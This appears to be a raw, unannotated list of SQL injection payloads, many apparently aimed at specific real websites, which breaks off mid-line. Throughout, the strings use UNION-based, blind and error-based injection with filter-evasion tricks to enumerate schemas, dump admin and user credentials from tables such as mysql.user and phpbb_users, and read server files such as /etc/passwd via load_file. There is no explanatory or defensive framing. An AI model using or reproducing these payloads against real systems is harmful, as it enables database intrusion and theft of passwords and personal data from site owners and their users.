select 1,concat_ws(0x3a3a,database(),user(),version()),3,4 -20 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8-- 20 union select 1,concat_ws(0x3a,name,login,password,email),3 from frumail_admins/* -20 union select 1,concat_ws(0x3a,user(),version(),@@version_compile_os),3,4,5,6,7-- -20 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -20 union select 1,concat_ws(0x3a,version(),user(),database())-- -20 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -20 uNIon sELEct 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -20 union select 1 from mysql.user-- -20 union select 1,password,user,4,5,6,7 from mysql.user/* -20' union select 1,user()/* -20 union select 1,username,password,4,5,6 from users limit 0,1 -- -20 union select 1,version(),3,4 -- -20 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14-- -20 union select concat(login,0x3a,pass),2,3 from ost-- -20 union select concat(version(),0x3a,user(),0x3a,database()) -20 union select concat(version(),0x3a,user(),0x3a,database())/* 20 union select concat(version(),0x3a,user(),0x3a,database()),222,333,444,555,666-- -20 UNION SELECT concat_ws(0x0b,user(),version(),database()),1 -20 union select concat_ws(0x3a,username,user_password,user_email),user(),user_password from phpbb_users where user_level=1/* -20 union select concat_ws(0x3a,user,password,host,file_priv,database(),version(),user(),0x3c42523e3c42523e,load_file(0x2f6574632f706173737764)),2,3,4,5,6,7 from mysql.user-- -20 union select concat_ws(char(58),username,password) from admin -21061 union select version(),2,3,4,5,6,7,8,9,10 -21080 UNION SELECT 0,1,concat_ws(0x0b,user(),version(),database()),3,4,5,6,7 21085 limit 0 UNION SELECT 1,2,3,4,5,6,7,CONCAT(Version(),Database(),User()),9,10,11-- -2108 union select concat_ws(0x3a3a,login,password),2,3,4,5,6 from admins -- -21096 union select 1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* 210' and 1=0 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=0x7a39303139365f626c696b69-- 210' union select 1,2,3,4,5,email,7,uid,9,10,11,12,13,version(),15,16 from user limit 1,1/* -210 union select 1,2,3,4,concat_ws(concat(char(32),char(58),char(32)),user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16 -210 UNION SELECT 1,concat(email,0x3a,password),3,4,5,6,7,8,9 from user limit 3,1/* -2110 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14/* 2113 and 1=0 union select 1,2,3,4,5,6,7,8,9-- -21149 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema='msi' -- -211 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8-- -211 union select 1,2,3,4,5,sin(pi()/3)-- -211 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16-- -211 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2-- -211 union select concat_ws(0x3a3a3a,version(),user(),database()),2,3,4,5,6,7/* 21263 and 1=2 union select 1,2,group_concat(concat_ws(0x3a,fullname,email,passw,status)),4,5,6,7,8 from admin-- -2126 union select 1,concat(username,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16 from users/* 2128 AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT_WS(CHAR(45,45),USER(),VERSION(),DATABASE()),15,16,17,18,19,20 -- -2128 union select 1,2,3,4,database(),6,concat(user(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18/* 212' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -212 union select 1,2,3,group_concat(aid,char(58),pwd,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from nuke_authors -- -212 union select 1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,concat(user,0x3a,password),6,7,8,9,10,11,12 from mysql.user/* -2135976 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48-- 21366 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 -- -2138 union select 1,2,3,4,5,6,concat(user,char(58),password),8,9 from mysql.user -- 213 aNd 1=0 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16 -- -213' and 1=0 union select 1,2,3,4,vErsIon(),usEr(),daTabase(),8,9,10,11,12,13,14,15,16 -- -213 union select 1,2,3,4,5,6,7,concat(version(),database(),user()),9,10 -213 union select 1,2,3,4,5,6,table_name from information_schema.tables -- 213 union select 1,2,user(),version(),database(),6,7,8,9,10,11,12/* 213 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10 from mysql.user/* -213 union select 1,username,userpass,4,5,6 from poll_user -- -213 union select concat_ws(char(58),user(),version()),2/* -2141' union select 1,2,3,concat_ws(char(35),version(),database(),user())/* 2144 and ascii(substring(version(),1,1))=53/* -2148 union select 1,2,concat_ws(0x3a3a,login,pass),4,5,6 from cms_admin limit 1,1 /* -21497 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users/* 21498 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 limit 1,1/* 214 and 1=0 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12-- 214 AND ascii(lower(substring(version(),1,1)))=51 -214 union select 1,2,3,4,concat_ws(0x3a,version(),database(),useR()),6,7,8,9,10,11-- -214 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16 -- -214 UNION SELECT 1,concat(userid,0x3a,username,0x3a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14 from user limit 0,1/* -214 union select 1,user_name,user_password,4 from admin/* 2150 and ascii(substring((concat_ws(char(58),user(),database(),version())),1,1))>1 215642-999.9 union select 1,version() -- 21595 union select unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5 limit 1,1/* -215 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -215 and 1=0 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x6368616e67655f656d61696c limit 0,1-- -215 and 1=0 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f617374726f6c6f6779 limit 0,1-- -215 and 1=0 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f626c6f636b6d61696c limit 0,1-- -215 and 1=0 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f636f756e747279 limit 0,1-- -215 and 1=0 union select 1,2,3,4,new_email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 change_email-- 215' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))-- -215 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f617374726f6c6f6779-- -215 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f626c6f636b6d61696c-- -215 union select 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns where table_name=0x646174696e675f636f756e747279-- -215 union select 1,2,3,4,concat_ws(0x3a3a3a,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.columns limit 166,1-- -215 union select 1,2,3,4,concat_ws(0x3a3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from dating_adminmembers-- -215 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from information_schema.tables-- -215 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14 -- -2161 union select 1,2,3,4,5,6,7,user(),database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68.69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119/* -2165 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16-- 2166 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,LOAD_FILE(0x2f6574632f706173737764),20,21,22,23,24,25,26,27 -2169 union select 1,concat_ws(0x2F,user,password),3,4,5,6 from mysql.user/* -216 union select 1,2,3,4,5,6,7,8,9,10,11,12,table_name,14,15,16,17,18,19 from information_schema.tables limit 28,1-- -216 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7,8-- 216 union select 1,2,3,version()-- -216 union select 1,2,convert(concat(version(),0x3a,user()) using latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -216 union select 1,group_concat(table_name separator 0x3a),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=0x677261666673 -- -216' union select concat(user,0x3a,password) from mysql.user /* -2170 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6-- -2171 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 217204' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 -- -2176 UniON SEleCT 1,2,3,4,5,6,7,8,9,10,11,12 /* -217 and 1=2 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -217 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -217' union select 1,2,3,4,5,6,7,8,version(),0,11,12,13,14,15,16/* -217 union select 1,2,concat(user_login,0x3b,user_passw),4,5,6,7 from auth_users/* -217 union select 1,config_name,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from phpbb_config limit 57,1/* -217 union select concat(username,0x3a,password) from users/* -217 union select concat_ws(0x3a,version(),@@version_compile_os,user()) -- -218283 union select 1,2,concat_ws(version(),database(),user()),4,5,6 -- -21846 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8-- -21868 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- -218 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -218 union select 1,2,concat_ws(version(),database(),user(),@@version_compile_os),'4',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- 218 union select 1,2 from qwerty -218 union select 1,concat_ws(char(58),name,password,email),3 from users limit 8,1/* -218 union select 1,database(),version(),4,5,6,7,user(),9,10,11,12/* 218 union select concat(database(),0x3a,version()),2,3,4,5/* -218 union select null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null 2191' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90-- 21940 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(0x3C623E44617461626173653A3C2F623E20,Database(),0x3C62723E3C623E557365726E616D653A3C2F623E20,User(),0x3C62723E3C623E56657273696F6E3A3C2F423E20,Version(),0x3C62723E3C623E446174613A3C2F623E20,table_name) from information_schema.tables LIMIT 18,1/* 2195 UNION SELECT concat(name,char(58),password) from users -- -2198 union select 1,2,3,column_name,5,6,7,8 from information_schema.columns where table_name=0x77705F7573657273 -- 21-999.9 union select 1,2,3,4,5,6,7,8-- 21-999.9 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database())-- -219 union select 1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database(),0x71),0x71),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58/* -219' union select 1,2,3,4,5,cast(concat(version(),0x2f,user()) as binary),7,8/* -219 union select 1,2,3,4 from information_schema.tables-- -219 union select 1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -219 UniOn sEleCt antidef 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),user(),con_cat_ws(0x3a,seqno,adminid,passwd,status,grade),21,22,23,24,25,26,database() from admin_01t LiMit 1,1 219 UNION SELECT CONCAT(0x3a,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x3a)-- 219' union select version(),2 21 and 1=0 UnIoN/**/SeLeCt 1,2,3,group_concat(id,0x3a,uname,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12 from registered_members 21 and 1=0 union select 1,2,3,version(),5,6,7,8,9,10 -- 21 and 1=0 UNION SELECT 1,version() -- -21 and 1=0 union select concat(username,char(58),password),2,3 from users 21 and 1=0 union select concat_ws(0x3a,user(),version(),database()),2 21 and 1=0 union select concat_ws(0x3a,version(),user(),database())-- 21 and 1=0 union select user(),database(),version()-- 21 and 1=2 uNiON aLl sElEcT 1,2,3,group_concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11-- -21 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4 -- -21 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13 -- 21=null union all select 0,concat(version(),0x3c62723e,database(),0x3c62723e,user()),2,3,4,5 from users-- -21 union select 0,concat(USER(),0x3a,DATABASE(),0x3a,VERSION()),2/* -21 union select 1,2,3/* 21 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4 -- -21 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574632f706173737764),27,28,29,30/* -21 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(email,char(58),password),14,15,16,17,18,19,20,21 from members limit 0,1/* -21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24-- -21' union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,0 -- -21 union select 1,2,3,4,5,6,7,group_concattable_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables -- -21 union select 1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9-- 21 union select 1,2,3,4,5,6,concat(login,char(58),password,char(58),email),8 from users/* -21 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8 -21 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13-- -21 union select 1,2,3,4,5,6,group_concat(table_name separator 0x3a),8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema=0x636d323330363737 -- -21 union select 1,2,3,4,5,concat(version(),0x3a,database(),user()),7,8/* -21 union select 1,2,3,4,5,version(),7,8,9-- -21 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from marcor_users/* 21 union select 1,2,3,4,concat(user,0x3a,password) from login/* -21 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14-- -21 union select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7 -- 2-1 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/* -21 union select 1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from users limit 0,1 -21 union select 1,2,3,concat(user(),version(),database(),@@version_compile_os) -21 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5 -21' UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8/* -21 union select 1,2,3,concat_ws(0x3b,database(),version(),user()),5-- -21 union select 1,2,3,group_concat(User_Name,Char(58),User_Pass),5,6,7,8 from revisi2_goodeats.tbl_user-- -21' union select 1,2,3,version(),5,6,7/* -21 union select 1,2,aes_decrypt(aes_encrypt(concat(username,0x3a,password),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users/* -21 union select 1,2,CAST(concat(column_name,char(58),table_name) AS BINARY),4 from information_schema.columns/* 21 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7/* -21 union select 1,2,concat_ws(0x3C6272202F3E,DATABASE(),USER(),VERSION()),4,5,6/* -21 union select 1,2 from orders/* -21 union select 1,2,version(),4,5,6,7,8,9-- -21 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,concat(user(),char(58),database()),15,16/* 21 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10 LIMIT 1,1-- -21 union select 1,cast(concat_ws(0x3a,version(),database(),user()) as binary),3,4,5,6,7-- -21 union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.columns where table_name='users' limit 6,1 -21 union select 1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 21 union select 1,concat(0x2,database(),user(),version()),3,4,5,6,7,8,9,10,11,12 limit 1,1 -21' union select 1,concat_ws(0x3A3a,name,password),3,4,5,6,7,8,9 from user/* 21 union select 1,concat_ws(0x3a,Login,Password,ICQ),3,4,5,6,7,8,9,0,1,2 from con_sltr__users-- -21 union select 1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11,12,13/* -2-1 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- 21' union select 1,concat_ws(0x3,user_name,user_pass,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from users limit 1,1 -- 21' union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 limit 1,1 -- -21' union select 1,concat_ws(char(58),name,password),3,4,5,6,7,8,9 from user/* -21 union select 1,concat_ws(char(58),version(),user(),database()),3,4/* -21 union select 1,concat_ws(version(),database(),user()),3,4,5-- -21 union select 1,password,login,4,5,6,7,8,9,10,11,12,13,14 from kredo_admins 21 union select 1,unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),3,4,5,6,7,8,9,10,11,12/* 2,1 UNION SELECT 1,version() -- 21 union select 1,version(),3,4,5,6,7,8,9,10,11 limit 1,1/* -21 union select 1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -21 union select 1,version(),database(),4,5-- -21 union select concat(user(),char(58),version(),char(58),database(),char(58)),2,3,4/* -21 union select concat_ws(0x3a,version(),database(),user()),2,3-- -21 union select concat_ws(0x3a,version(),user(),database()),2,3-- -21 union select concat_ws(0x3a,version(),user(),version(),database()),2,3,4-- -21 union select table_name from information_schema.columns where column_name like 0x70617373776f7264-- 21 union select unhex(hex(concat_ws(0x3b,version(),user(),database()))),2 220201' and 1=0 UnIon 2203 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10-- 22048 and null union select unhex(hex(concat_ws(0x3a,user(),database(),version()))),2,3,4 -2206 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17 220 and 1=0 union select 1,2,group_concat(column_name separator 0x3c62723e),4 from information_schema.columns where table_name=0x625f666f72756d5f656d61696c-- -220' union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7 -- -220 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables limit 57,1/* 220 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8 from admintable/* -220 union select 1,name,3,4,5,6,7,8,9,10,11 from regions/* -22114' union select 1,2,3,4,5,concat_ws(0x3a3a,id,email,nom,mdp,droit,nom_prenom,fonction,signature,signature_defaut,page_defaut),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin /* 2215.9 union all select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- 221 and 1=0 union select 1,2,3,4,5,version(),7,8 -- -221 union all select '1',username,'3',password,'5','6',null,'8','9' from users# -221 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13-- 221 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -2220 union select concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 222222222 union select 1,2,3,4,5,6,7,8,concat(USER(),char(59),DATABASE(),char(59),VERSION()),10,concat(username,char(59),password),12,13,14,15,16,17 from users/* 222222222 union select 1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11/* 222222 union select 1,2,concat(user,char(58),password) from mysql.user/* 22222 union select 1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* -2222' union select 1,2,concat_ws(0x2F,version(),database(),user()),4/* 2222' union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4/* -2222 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/* 2226 and 1=0 UNION SELECT 1,2,3,version(),5,6,7,8 -- 22.2 union all select concat_ws(0x3a,user(),version(),database()) -- 222 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162-- -222 union select 1,2,3,4,5,6,concat_ws(char(58),user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -222 union select 1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/* -222 union select 1,concat_ws(0x3a3a,login,contrasena,nombre),3,4,5,6,7,8,9,10,11,12 from usuarios limit 2,1 /* -222 union select 1,concat_ws(0x3a3a,user_id,user_company,user_name,user_email,group_id),3,4,5,6,7,8,9 from users /* 22312' and 1=0 UnIon selECt 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin -- 2233-999.9 union select 1,2,user(),4-- 2234 UNION SELECT TOP 10 password,password,password,password,password,password,password,password,password,password,password FROM USERS 2237 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,version(),database(),user()))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 limit 1,1/* -2237' union select 1,2,aes_decrypt(aes_encrypt(customers_email_address,char(58),customers_password,1),1) from customers-- 223 and 0 union select 1,2,3,4,5,6,7,8,9,10-- -223' union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='_kullanicilar'-- 2241 and ascii(lower(substring(user(),4,1)))<=97 -22483 union select 1,2,3,user(),5,6,version(),database(),9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -2249' union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 224 and 1=1 union select 1,2,3,concat_ws(0x3a,table_schema,table_name,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns limit 395,1-- 224 and 1=1 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 limit 1,1-- 224 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 LIMIT 1,1 -224 union select 1,2,3,4,5,6,group_concat(table_name),8,9 from information_schema.tables -- -224 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables -- -224 union select 1,2,3,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12-- -224 union select 1,2,concat(user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16 -224 union select 1,2,concat_ws(0x3a,version(),database(),users()),4,5,6,7-- 224 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,11-- -2257 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10 225' aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12 -- 225 union select 1,2,3,4,5,6,0xc7ebfeeae020e1fbeb20e7e4e5f1fc203a29/* -225 union select 1,2,concat_ws(0x3a,id,name,email,ip_address),4,5,6,7 from ibf_members/* 225 union select 1,2,database(),4,5,6,7,8,9,10 /* 22601 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(load_file(0x2F686F6D652F69746F74616C2E72752F7777772F61646D696E2F6E616D652E706870),0x73),0x73),5,6,7,8,9,0,1/* 22627' and 1=0 UnIon selECt 1,2,3,4,5,group_concat(table_name separator '
'),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=0x686f7274696e657773 -- 226 and 1=0 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17-- 226' and 1=-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,DataBase(),user(),16,17,18,19/* -226 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 -- -226' union select 1,2,concat_ws(0x3a3a,username,password),6,5,6,7,8,9,10,11 from users /* -2272' union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables group by table_schema limit 2,1 -- -22740' union select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11,12,13,14,15/* -22775' union select 1,concat(user,char(58),password),3 from mysql.user limit 0,1/* -2278 uNiOn sElEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103 /* 2279' or 1=(select top 1 table_name from information_schema.tables where table_name not in ('ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl'))-- -227 union select 1,2,3,4,5,7,8,9,10,concat_ws(0x3a,database(),version(),user()),12,13-- 227 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 limit 1,1 227 UNION SELECT 1,2,3,4,(SELECT CONCAT_ws(0x3a,aUsername,aPassword,aemail) FROM db_mysupermarketro.Account LIMIT x,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 limit 1,1 -227 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,52/* -227' union select 